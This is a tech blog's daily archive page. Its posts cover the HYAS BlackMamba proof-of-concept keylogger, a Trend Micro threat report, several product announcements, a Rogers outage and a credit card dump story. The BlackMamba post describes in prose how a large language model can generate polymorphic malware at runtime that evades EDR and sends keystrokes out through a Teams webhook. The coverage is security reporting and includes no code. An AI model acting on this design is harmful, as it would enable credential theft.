Archive for March 7, 2023

HYAS issues POC of BlackMamba AI-based polymorphic malware

Posted in Commentary with tags on March 7, 2023 by itnerd

To illustrate what AI-based malware is capable of, the team at HYAS Labs has just released a proof of concept (PoC) exploiting a large language model to synthesize polymorphic keylogger functionality on-the-fly, dynamically modifying the benign code at runtime — all without any command-and-control infrastructure to deliver or verify the malicious keylogger functionality. The POC and results are published in the HYAS blog post BlackMamba: Using AI to Generate Polymorphic Malware and whitepaper “HYAS Labs Threat Intelligence: BlackMamba AI-Synthesized, Polymorphic Keylogger with On-the-Fly Program Modification.”

To create the POC, HYAS researchers united two seemingly disparate concepts:

a) eliminating the command and control (C2) channel by using malware that could be equipped with intelligent automation and could push-back any attacker-bound data through some benign communication channel, and

b) leveraging AI code generative techniques that could synthesize new malware variants, changing the code such that it can evade detection algorithms.

BlackMamba utilizes a benign executable that reaches out to a high-reputation API (OpenAI) at runtime, so it can return synthesized, malicious code needed to steal an infected user’s keystrokes. It then executes the dynamically generated code within the context of the benign program using Python’s exec() function, with the malicious polymorphic portion remaining totally in-memory. Every time BlackMamba executes, it re-synthesizes its keylogging capability, making the malicious component of this malware truly polymorphic. BlackMamba was tested against an industry leading EDR which will remain nameless, many times, resulting in zero alerts or detections.

Once a device is infected, BlackMamba uses MS Teams. Using its built-in keylogging ability, BlackMamba can collect sensitive information, such as usernames, passwords, credit card numbers, and other personal or confidential data that a user types into their device. Once this data is captured, the malware uses MS Teams webhook to send the collected data to the malicious Teams channel, where it can be analyzed, sold on the dark web, or used for other nefarious purposes.

Delivery uses auto-py-to-exe, an open-source Python package that lets developers convert Python scripts into standalone executable files that can be run on Windows, macOS, and Linux operating systems. As the HYAS blog notes: “The threats posed by this new breed of malware are very real. By eliminating C2 communication and generating new, unique code at runtime, malware like BlackMamba is virtually undetectable by today’s predictive security solutions.”

The HYAS BlackMamba Blog and the full whitepaper are linked here.

UPDATE: I have two comments on this. The first is from Matt Mullins, Senior Security Researcher at Cybrary

   “The BlackMamba sample is very interesting due to its integration of ChatGPT to “prompt hack” as part of its initial payload. The malware sends a prompt to ChatGPT, then using that returned information as part of the python code (the exec function) creates the code, which is then injected and subsequently communicates back via teams webhook. This is a very simple yet very advanced piece of malware because it flies under most detection radars by simply using the same applications that users would (either out of curiosity or by job necessity).

   “The article says that it doesn’t have a C2, but technically it is using teams for the communication so what (in my opinion) would be a better term is the use of high reputation servers for the “C2” comms (Teams and the Microsoft infrastructure). This strategy isn’t entirely new as it has been used before with things like CDNs to bypass filters. Teams has been adopted by a large number of organizations, and also has a couple of issues beyond this that should warrant a serious conversation about its viability as a secure communications channel.

   “The BlackMamba malware is thoughtfully crafted, simple, and elegant. Thus it passes the sniff test of “KISS” or keep-it-simple-stupid when it comes to engineering. The creative use of ChatGPT with the injection code, along with the use of Teams, creates a really great 1-2 punch for bypassing most EDR and detections (human and machine based) as it allows the malware to “swim with the people.” This is a gold-standard for good OpSec, typically.”

Morten Gammelgaard, EMEA, co-founder of BullWall follows up with this: 

   “Truly unnerving. AI controlled Polymorphic malware without the need of command & control. This is a slam dunk – preventative measures will never be able to keep up and therefore will continue to be less and less effective. 

   “This particular approach is one example of how the malware never looks the same (the AI regenerates it on each attack) so defenders cannot establish a model to defend against as they now do with known attack methods. The “keystroke” example here takes a common approach to how credentials are stolen and then used for access and shows how that approach can be made much more effective, ie: bypass defenses.  Not to mention that this approach did not even require a dedicated C2 server that could be tracked.

   “Also, Polymorphic viruses historically rely on mutation engines to alter their decryption routines. If publicly available AI engines enable script kiddies to create these viruses, that’s a real problem.

   “When stealing system specific credentials becomes easy, then access and lateral movement is easy and Bam! they have your data. At that point how they harm you is almost moot. Data theft and ransomware are a popular abuses when that happens. So yeah, easier access is a very big deal.”

Leave a comment »

Government, Manufacturing, and Healthcare were top targets for cybercriminals in Canada in 2022

Posted in Commentary with tags on March 7, 2023 by itnerd

 Trend Micro today announced a massive 55% increase in overall threat detections in 2022 and a 242% surge in blocked malicious files, as threat actors indiscriminately targeted consumers and organizations across all sectors.

The roundup report reveals several interesting trends for 2022 and beyond:

The top three MITRE ATT&CK techniques show us that threat actors are gaining initial access through remote services, then expanding their footprint within the environment through credential dumping to utilize valid accounts.

An 86% increase in backdoor malware detections reveals threat actors trying to maintain their presence inside networks for a future attack. These backdoors primarily targeted web server platform vulnerabilities.

A record number of Zero Day Initiative (ZDI) advisories (1,706) for the third year in a row is the result of a rapidly expanding corporate attack surface and researcher investment in automated analysis tools, which are finding more bugs. The number of critical vulnerabilities doubled in 2022. Two out of the top three CVEs reported in 2022 were related to Log4j.

The ZDI observed an increase in failed patches and confusing advisories, adding extra time and money to corporate remediation efforts and exposing organizations to unnecessary cyber risk.

Webshells were the top-detected malware of the year, surging 103% on 2021 figures. Emotet detections were second after undergoing something of a resurgence. LockBit and BlackCat were the top ransomware families of 2022.

Ransomware groups rebranded and diversified in a bid to address declining profits. In the future, we expect these groups to move into adjacent areas that monetize initial access, such as stock fraud, business email compromise (BEC), money laundering, and cryptocurrency theft.

Trend Micro recommends that organizations adopt a platform-based approach to managing the cyber-attack surface, mitigate security skills shortages and coverage gaps, and minimize the costs associated with point solutions. This should cover the following:

  • Asset management. Examine assets and determine their criticality, any potential vulnerabilities, the level of threat activity, and how much threat intelligence is being gathered from the asset.
  • Cloud security. Ensure that cloud infrastructure is configured with security in mind to prevent attackers from capitalizing on known gaps and vulnerabilities.
  • Proper security protocols. Prioritize updating software as soon as possible to minimize the exploitation of vulnerabilities. Options such as virtual patching can help organizations until vendors provide official security updates.
  • Attack surface visibility. Monitor disparate technologies and networks within the organization, as well as any security system that protects them. It may be difficult to correlate different data points from siloed sources.

To read a full copy of the report, Rethinking Tactics: 2022 Annual Cybersecurity Report, please click here.

It covers endpoints (Android & iOS, IoT, IIoT, PCs, Macs, Linux, servers), email, web and network layers, OT networks, cloud, home networks, vulnerabilities, consumers, businesses, and governments globally.

Leave a comment »

TELUS introduces the next generation of Optik TV

Posted in Commentary with tags on March 7, 2023 by itnerd

Today, TELUS introduced its next generation of Optik TV, unleashing a revolutionary content experience and simplifying the way customers find, stream and interact with their favourite content. The new Optik TV offers live and on demand TV across all devices, in addition to new features like personalized profiles, universal search, voice remote and access to thousands of apps through the Google Play Store, all in one intuitive digital box, making the entertainment experience for customers easier and better than ever. 

Powered by a sleek TELUS TV Digital Box with Bluetooth voice remote that takes only minutes to set up, the new Optik TV provides customers with an immersive entertainment experience. New features include: 

  • Simplified menu: The simplified menu and home screen provide easy access to live TV, recordings, search and On Demand content on the navigation bar.
  • Personalized profiles: Enjoy a more personalized TV experience where every member of the household can create a unique profile and get a customized home screen showcasing their favourite channels, movies, recent recordings, and the ability to pick up where they left off at any time.
  • Voice remote: Powered by Google Assistant, customers can control their TV and search for shows using the built-in microphone on the TELUS Remote.
  • Universal search: Customers can conveniently search across Live TV, On Demand, and streaming services to discover content faster without switching between apps.
  • Unlimited recordings: Cloud PVR offers customers unlimited recording capacity so they can save as many shows as they want, and watch them from any device at any time, anywhere in Canada through the TELUS TV+ app.
  • Sports Zone: Customers can create a curated home page capturing their favourite events and sports teams to easily navigate to live or upcoming games and current scores with just a single click.

Optik TV provides access to thousands of apps from Google Play, including YouTube, Netflix, and Amazon Prime Video preloaded for easy access. All plans come with the Core TV package which includes up to 36 HD channels, as well as local favourites. Customers can choose a Core+ Premium package which includes one premium streaming service such as Netflix for just $38 per month. For even more content, TELUS offers the Combo packages such as 4 Theme Packs + 1 Premium and 7 Theme Packs + 1 Premium where customers can choose from popular theme packs such as Disney Time, Sportsnet & Beyond, and Blockbusters. To learn more about TELUS Optik TV, visit www.telus.com/optiktv

Leave a comment »

Rogers Appears To Have Issues…. Serious Issues

Posted in Commentary with tags on March 7, 2023 by itnerd

Canadian telco Rogers isn’t having a good day based on this from Down Detector:

From a combination of my clients calling me and trolling the Internet, I can say that the problems that Rogers seems to be having cover the following areas:

  • Email if you are using a @Rogers.com email account. More on that in a second.
  • Rogers Ignite Internet
  • Cell Phone connectivity

In terms of Rogers email issues, this seems to have been going on for days as evidenced by this thread on Rogers own support forums. Which is confirmed by numerous clients of mine pleading me to help them. The good news, if you want to call it that is that if you go to https://mail.yahoo.com and enter your Rogers email account details there, you can still get your email. But to be frank, this is a workaround and not a solution. Also trying to create App Specific Passwords for Rogers email accounts does not work.

Clearly, Rogers has serious issues at the moment, and customers are not happy based on these examples from Twitter:

With this latest outage combined with what happened last July, any remaining goodwill that Rogers might have had is gone. And Rogers may not only find itself losing customers, but being forced to explain itself to Parliament, again. I’ll be watching this story as this is another situation where Rogers has absolutely crippled the daily existence of Canadians and I will provide updates when the situation warrants.

UPDATE: In terms of the Internet issues that Rogers is having. What seems to be working for some people (including a client of mine) is this:

You can try this and see if it works for you.

UPDATE 3/9: Rogers continues to have issues. I’ve documented them here.

13 Comments »

Uber sharing travel trends and new making airport travel a breeze with new features

Posted in Commentary with tags on March 7, 2023 by itnerd

Canadians everywhere are flying out of their seats at the opportunity to travel and get out to see the world again. And with spring and March Break just around the corner, many Canadians are looking for easier ways to plan their travel and navigate buzzing airports across the country.

As Uber trips to the airport are outpacing pre-pandemic levels, today, Uber is launching new in-app products and features as well as sharing Canadian travel trends to take stress and guesswork out of travel planning and, ultimately, help get Canadians to and from, and even around, the airport as quickly and efficiently as possible.

NEW IN-APP PRODUCTS AND FEATURES

  • Be ready to roll from the get-go: With Uber Travel, you can reserve rides for each leg of your itinerary in one fell swoop. Just connect your Gmail account and Uber will do the rest, organizing your hotel, flight, and restaurant reservations all in one place for a stress-free travel experience. With Uber Reserve, you can choose the ride that best fits your budget, luggage, and group size needs. Plus, you can also book your ride up to 90 days in advance, enabling you to lock in your ride at the same time as your flight and hotel, leaving no part of your trip to chance.
  • Minimize airport wandering to maximize your time for adventure: Seamlessly make your way through the airport with the new step-by-step wayfinding feature on our app. With detailed directions to get from the gate to the rideshare pick-up area, their new wayfinding product will help you navigate through airports with ease. Available at 30+ airports across the globe including Toronto YYZ and Calgary YYC in Canada.
  • Every minute counts: We all know the feeling of waiting to deboard a plane and wondering how long it’ll take to get from the gate to your ride. That’s why Uber is rolling out a new feature to help you plan how long it will take to walk from your gate to baggage claim, so you can accurately request your Uber ride. Available soon at more than 400 airports around the world including airports in the following Canadian cities: Montreal, London, Vancouver, Kitchener-Waterloo, Regina, Winnipeg, Calgary, Hamilton, Halifax, Ottawa, Quebec City, Toronto, Windsor, Kingston, Edmonton, Niagara Region, and Saskatoon.
  • Business Travel: Soon Uber for Business will be rolling out Business Comfort in select cities, an exclusive ride option for those traveling for work with a unique business-class experience. 

CANADIAN TRAVEL TRENDS 

Heading into one of the year’s busiest travel seasons, Uber looked at Uber Rides data to share new trends and insights highlighting how Canadians like to travel—from the busiest time and day of the week for travel to and from the airport to their favourite pre-flight eats!

Whether it’s arriving at the airport with enough time to grab a bite or looking for a quick and easy ride home after your travels, check out how these Canadian travel habits might help you plan your next trip.

Hello beauty sleep and goodbye to the red-eye

  • We’re a nation of early risers that want to be home by the end of the workday. On average, Canadians travel the most to the airport at 6:00 a.m. and back home at 5:00 p.m. Toronto is full of keeners, with the earliest travel time to the airport at 5:00 a.m. and Vancouverites want to be home by lunch, precisely at noon. 

We’d rather celebrate TGIF in the sky

  • What better way to kick off travel plans than with a weekend to play? Canadians would rather travel to the airport on Fridays and give themselves a three-day weekend by travelling back home from the airport on Mondays. If one thing is for sure, it’s that we know how to live it up.

We take our pre-flight culinary pre-gaming seriously

  • Many of us resort to snacking while waiting to board our flights—”treat yourself” is a way of life in our great nation. Canadians’ favourite way to do this? With breakfast sandwiches and muffins. As expected, we also have city-specific tastes. Toronto and Calgary have a penchant for spice with orders like pad thai, chicken shawarmas, butter chicken, and naan. Montréal loves tried, tested, and true comfort foods—think dumplings, fried chicken, and burgers. And Vancouver? With a (very specific) popular order of half chicken, fries, and soup, we’ll let you decide for yourself.

PROMO 

To help Canadians prepare for takeoff with these new airport features, Uber One members who use Uber Reserve in March 2023 will earn $20 in Uber Cash to put towards their next Reserve ride with the code GORESERVE. Canadians can rely on Uber to help them get where they need to go and back again safely, stress-free, and on time.

The full news release on the Uber website here.

Leave a comment »

Salesforce Makes Several AI Related Announcements Today

Posted in Commentary with tags on March 7, 2023 by itnerd

Today, Salesforce put out a number of announcements. Each announcement leans into building responsible generative AI tools and ensuring they’re accessible to all scales of business. 

Einstein GPT

  • EinsteinGPT is the next generation of Einstein, Salesforce’s AI technology which currently delivers more than 200 billion AI-powered predictions across Customer 360 per day. 
  • With the combination of proprietary Einstein AI models with leading large language models, customers can use natural-language prompts on CRM data to trigger powerful, time-saving automations, and create personalized, AI-generated content.
  • At hyperscale, the technology delivers AI-created content across every sales, service, marketing, commerce and IT interaction.

ChatGPT for Slack

  • As part of an ongoing partnership, Salesforce and OpenAI introduced the ChatGPT app for Slack, built by OpenAI on the Slack platform, available immediately to all users. 
  • The app taps ChatGPT’s powerful AI technology to bring instant conversation summaries, research tools, and writing assistance directly into Slack. With the new integration, customers can:
    • Get up to speed faster on channels or thread: AI-powered conversation summaries help users quickly catch up on what’s happening.
    • Instantly find answers on any project or topic: AI-powered research tools, users can learn and build expertise faster right from Slack — whether they’re researching best practices, prospecting a new account, and more.
  • Draft messages in seconds to communicate with customers and teams: AI-powered writing assistance, users can spend less time crafting replies, status updates, and meeting notes — and more time putting the plan in action.

Salesforce Ventures Generative AI Fund

  • Salesforce Ventures launched a $250 million generative AI fund to bolster the startup ecosystem and spark the development of responsible generative AI. 
  • The fund will initially invest in four companies, AnthropicHearthYou.com and Toronto-based  Cohere.ai. Each organization has demonstrated an ability to meaningfully transform application software and impact end users’ workflows using responsible and trusted development processes.

You can click the links above to learn more about each announcement.

Leave a comment »

Cradlepoint Unveils New Global MSP Program

Posted in Commentary with tags on March 7, 2023 by itnerd

Cradlepoint, the global leader in cloud-delivered LTE and 5G wireless network solutions, today announced significant updates for Managed Service Providers (MSPs) at this year’s North American Partner Summit in Austin, Texas, March 7-8. To bolster the managed service provider (MSP) experience, Cradlepoint will expand its current offerings as part of the existing Cradlepoint Partner Program, including enhancing NetCloud functionality and licensing benefits, specialized support, and the development of an “MSP Playbook.”

Organizations across industries increasingly turn to wireless solutions, such as 5G, to deliver agile, secure, and reliable wide-area network (WAN) connectivity. Gartner believes that the year of “wireless value realization” is upon us, with 50 per cent of enterprise wireless endpointsexpected to use networking services that deliver additional capabilities beyond communication by 2025. This rapidly growing market underscores a significant opportunity for Cradlepoint and its partners to expand their Wireless WAN leadership, particularly regarding MSPs leveraging Cradlepoint’s NetCloud Service and portfolio of fixed sites, mobile, and IoT cellular routers.

Customers leverage managed services to cut IT costs and stay current with new technologies. In response, MSP customers rely on Cradlepoint solutions, managed by NetCloud Manager, to meet growing needs. Cradlepoint is introducing a new flexible subscription model, allowing MSPs to control their customer lifecycle and bolstering profitability while rewarding partners for their performance and loyalty through future lead generation capabilities.

Specific new enhancements include: 

●  Updated Benefits and Requirements that align with the MSP practice 

●  Cradlepoint University Training targeted specifically for the MSP practice

●  New MSP-only subscription model and pricelist

●  Planned NetCloud Manager enhancements exclusively for MSPs

●  “White glove” logistics support

In addition to these enhancements, Cradlepoint will develop an “MSP Playbook,” set to launch in the second half of this year. As part of the playbook, partners will receive guidance on their market opportunity, use cases & success stories, marketing, sales, training support, and a full program review. The Playbook is designed to support MSPs further as they work with Cradlepoint to create and deliver managed networking and cloud-based services as key components in their offerings.

To learn more about the Cradlepoint Partner Program with the new MSP entitlements that will launch in Q3 2023, please visit Cascade or https://cradlepoint.com/partners/for-partners/resell-partners/.

Leave a comment »

BidenCash Market Posts 2Mill Credit Cards Online In Birthday Blitz 

Posted in Commentary with tags on March 7, 2023 by itnerd

First reported by Cyble researchers last week, this story continues to get lot of buzz from Fox News and others this week. A web site that goes by the name of Biden Cash Market has posted 2 million credit cards online as a promotional blitz to attract customers. The site operates on both on the dark and clear web, offering credit card data for sale to the public.

The leaked information includes cardholders’ full names, card numbers, bank details, expiration dates, CVV codes, home addresses, and over 500,000 email addresses. According to D3Lab’s Head of Threat Intelligence, Andrea Draghetti, while tens of thousands the numbers are duplicates, over two million of the entries are unique.

Last fall the same BidenCash Market released a free dump of over a million credit cards in a similar promotional gimmick. 

Baber Amin, COO of Veridium had this to say:

   “Even the most security aware can have their credit card information compromised and made available. This can happen due to no fault of the individual.

   “The data dump is not just about credit card information but contains valuable information that can be used for Identity theft. This second part should be a more serious concern, as it can lead to damage to credit score, reputation, and possibly legal issues. The damage from identity theft is long lasting.

On the financial side, the two main points of credit card compromise are:

  1. Point of sale and
  2. magecart or online skimming.

   “EMV or chip cards were supposed to stop point of sale skimming. But because all EMV cards also have a mag stripe, if someone compromises the POS terminal where users are putting in their card, they can skim the information from the magstripe bypassing chip security.

   “Contactless cards aka “Touch and Pay” is thus more secure than even EMV, as the card never needs to be inserted into any device and never leaves the user.

  • As a merchant, make sure your POS terminals are up to date, especially for areas that are publicly visible, e.g. gas pumps, vending machines, ticket kiosks, etc.
  • As an end user, always opt to use contactless payment at the point of sale.

   “Magecart or online skimming is the compromise of online shopping carts and checkout process.  Bad actors can inject malware into ill maintained ecommerce sites. 

   “Additionally, all the security offered by EMV and contactless cards is nullified, when the user voluntarily enters the CC information at checkout. Not only that, but they also enter information that can be used for Identity Theft, e.g. email address, shipping address, possibly a username and a password, etc.

  • It is important for website administrators to stay up-to-date with their content management system’s patches and plugins. 
  • Buying from reputable online vendors is the best option for end users:
    • If possible, use virtual cards online
    • Use unique usernames and passwords on each site if you must create an account
    • If they offer PayPal during checkout, use it, as it creates an indirect level of payment
    • A better solution is to use services like Apple Pay and Google Pay, which replace sensitive information with arbitrary tokens (Tokenization). These services provide a more secure and convenient experience, as they use tokenization to protect sensitive information. Since these tokens disappear after each authorization, they cannot be reused if stolen. The other advantage of these services is that they work both in person and for online shopping. EMV or chip cards are reduced to the security of the older non chip card when paying online, as there is no chip reader available.”

These are all good tips that I hope become the norm so that scams like this become a thing of the past.

Leave a comment »